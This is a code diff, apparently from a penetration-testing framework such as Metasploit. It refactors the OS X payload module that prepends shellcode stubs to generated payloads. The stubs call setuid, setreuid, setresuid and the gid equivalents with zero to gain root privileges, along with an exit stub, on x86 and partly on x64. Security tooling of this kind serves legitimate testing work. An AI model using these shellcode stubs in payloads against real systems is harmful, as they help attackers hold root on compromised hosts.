@@ -73,95 +73,126 @@ def initialize(info = {})
7373 ret
7474 end
7575
76-
77- #
78- # Overload the generate() call to prefix our stubs
79- #
80- def generate ( *args )
81- # Call the real generator to get the payload
82- buf = super ( *args )
76+ def apply_prepends ( buf )
77+ test_arch = [ *( self . arch ) ]
8378 pre = ''
8479 app = ''
8580
86- test_arch = [ *( self . arch ) ]
87-
8881 # Handle all x86 code here
8982 if ( test_arch . include? ( ARCH_X86 ) )
83+ handle_x86_osx_opts ( pre , app )
84+ elsif ( test_arch . include? ( ARCH_X86_64 ) )
85+ handle_x64_osx_opts ( pre , app )
86+ end
87+
88+ pre + buf + app
89+ end
90+
91+ def handle_x86_osx_opts ( pre , app )
92+ if ( datastore [ 'PrependSetresuid' ] )
93+ # setresuid(0, 0, 0)
94+ pre << "\x31 \xc0 " +# xorl %eax,%eax #
95+ "\x50 " +# pushl %eax #
96+ "\x50 " +# pushl %eax #
97+ "\x50 " +# pushl %eax #
98+ "\x50 " +# pushl %eax #
99+ "\x66 \xb8 \x37 \x01 " +# movw $0x0137,%ax #
100+ "\xcd \x80 " # int $0x80 #
101+ end
102+
103+ if ( datastore [ 'PrependSetreuid' ] )
104+ # setreuid(0, 0)
105+ pre << "\x31 \xc0 " +# xorl %eax,%eax #
106+ "\x50 " +# pushl %eax #
107+ "\x50 " +# pushl %eax #
108+ "\x50 " +# pushl %eax #
109+ "\xb0 \x7e " +# movb $0x7e,%al #
110+ "\xcd \x80 " # int $0x80 #
111+ end
112+
113+ if ( datastore [ 'PrependSetuid' ] )
114+ # setuid(0)
115+ pre << "\x31 \xc0 " +# xorl %eax,%eax #
116+ "\x50 " +# pushl %eax #
117+ "\x50 " +# pushl %eax #
118+ "\xb0 \x17 " +# movb $0x17,%al #
119+ "\xcd \x80 " # int $0x80 #
120+ end
121+
122+ if ( datastore [ 'PrependSetresgid' ] )
123+ # setresgid(0, 0, 0)
124+ pre << "\x31 \xc0 " +# xorl %eax,%eax #
125+ "\x50 " +# pushl %eax #
126+ "\x50 " +# pushl %eax #
127+ "\x50 " +# pushl %eax #
128+ "\x50 " +# pushl %eax #
129+ "\x66 \xb8 \x38 \x01 " +# movw $0x0138,%ax #
130+ "\xcd \x80 " # int $0x80 #
131+ end
90132
91- # Prepend
92-
93- if ( datastore [ 'PrependSetresuid' ] )
94- # setresuid(0, 0, 0)
95- pre << "\x31 \xc0 " +# xorl %eax,%eax #
96- "\x50 " +# pushl %eax #
97- "\x50 " +# pushl %eax #
98- "\x50 " +# pushl %eax #
99- "\x50 " +# pushl %eax #
100- "\x66 \xb8 \x37 \x01 " +# movw $0x0137,%ax #
101- "\xcd \x80 " # int $0x80 #
102- end
103-
104- if ( datastore [ 'PrependSetreuid' ] )
105- # setreuid(0, 0)
106- pre << "\x31 \xc0 " +# xorl %eax,%eax #
107- "\x50 " +# pushl %eax #
108- "\x50 " +# pushl %eax #
109- "\x50 " +# pushl %eax #
110- "\xb0 \x7e " +# movb $0x7e,%al #
111- "\xcd \x80 " # int $0x80 #
112- end
113-
114- if ( datastore [ 'PrependSetuid' ] )
115- # setuid(0)
116- pre << "\x31 \xc0 " +# xorl %eax,%eax #
117- "\x50 " +# pushl %eax #
118- "\x50 " +# pushl %eax #
119- "\xb0 \x17 " +# movb $0x17,%al #
120- "\xcd \x80 " # int $0x80 #
121- end
122-
123- if ( datastore [ 'PrependSetresgid' ] )
124- # setresgid(0, 0, 0)
125- pre << "\x31 \xc0 " +# xorl %eax,%eax #
126- "\x50 " +# pushl %eax #
127- "\x50 " +# pushl %eax #
128- "\x50 " +# pushl %eax #
129- "\x50 " +# pushl %eax #
130- "\x66 \xb8 \x38 \x01 " +# movw $0x0138,%ax #
131- "\xcd \x80 " # int $0x80 #
132- end
133-
134- if ( datastore [ 'PrependSetregid' ] )
135- # setregid(0, 0)
136- pre << "\x31 \xc0 " +# xorl %eax,%eax #
137- "\x50 " +# pushl %eax #
138- "\x50 " +# pushl %eax #
139- "\x50 " +# pushl %eax #
140- "\xb0 \x7f " +# movb $0x7f,%al #
141- "\xcd \x80 " # int $0x80 #
142- end
143-
144- if ( datastore [ 'PrependSetgid' ] )
145- # setgid(0)
146- pre << "\x31 \xc0 " +# xorl %eax,%eax #
147- "\x50 " +# pushl %eax #
148- "\x50 " +# pushl %eax #
149- "\xb0 \xb5 " +# movb $0xb5,%al #
150- "\xcd \x80 " # int $0x80 #
151- end
152- # Append
153-
154- if ( datastore [ 'AppendExit' ] )
155- # exit(0)
156- app << "\x31 \xc0 " +# xorl %eax,%eax #
157- "\x50 " +# pushl %eax #
158- "\xb0 \x01 " +# movb $0x01,%al #
159- "\xcd \x80 " # int $0x80 #
160- end
133+ if ( datastore [ 'PrependSetregid' ] )
134+ # setregid(0, 0)
135+ pre << "\x31 \xc0 " +# xorl %eax,%eax #
136+ "\x50 " +# pushl %eax #
137+ "\x50 " +# pushl %eax #
138+ "\x50 " +# pushl %eax #
139+ "\xb0 \x7f " +# movb $0x7f,%al #
140+ "\xcd \x80 " # int $0x80 #
141+ end
161142
143+ if ( datastore [ 'PrependSetgid' ] )
144+ # setgid(0)
145+ pre << "\x31 \xc0 " +# xorl %eax,%eax #
146+ "\x50 " +# pushl %eax #
147+ "\x50 " +# pushl %eax #
148+ "\xb0 \xb5 " +# movb $0xb5,%al #
149+ "\xcd \x80 " # int $0x80 #
162150 end
163151
164- return ( pre + buf + app )
152+ if ( datastore [ 'AppendExit' ] )
153+ # exit(0)
154+ app << "\x31 \xc0 " +# xorl %eax,%eax #
155+ "\x50 " +# pushl %eax #
156+ "\xb0 \x01 " +# movb $0x01,%al #
157+ "\xcd \x80 " # int $0x80 #
158+ end
159+ end
160+
161+ def handle_x64_osx_opts ( pre , app )
162+ if ( datastore [ 'PrependSetresuid' ] )
163+ raise RuntimeError , "PrependSetresuid is not implemented"
164+ end
165+
166+ if ( datastore [ 'PrependSetreuid' ] )
167+ # setreuid(0, 0)
168+ pre << "\x41 \xb0 \x02 " +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
169+ "\x49 \xc1 \xe0 \x18 " +# shl r8, 24
170+ "\x49 \x83 \xc8 \x7e " +# or r8, 126 (setreuid=126)
171+ "\x4c \x89 \xc0 " +# mov rax, r8 311
172+ "\x48 \x31 \xff " +# xor rdi, rdi 0
173+ "\x48 \x31 \xf6 " +# xor rsi, rsi 0
174+ "\x0f \x05 " # syscall
175+ end
176+
177+ if ( datastore [ 'PrependSetuid' ] )
178+ raise RuntimeError , "PrependSetuid is not implemented"
179+ end
180+
181+ if ( datastore [ 'PrependSetresgid' ] )
182+ raise RuntimeError , "PrependSetresgid is not implemented"
183+ end
184+
185+ if ( datastore [ 'PrependSetregid' ] )
186+ raise RuntimeError , "PrependSetregid is not implemented"
187+ end
188+
189+ if ( datastore [ 'PrependSetgid' ] )
190+ raise RuntimeError , "PrependSetgid is not implemented"
191+ end
192+
193+ if ( datastore [ 'AppendExit' ] )
194+ raise RuntimeError , "AppendExit is not implemented"
195+ end
165196 end
166197
167198
0 commit comments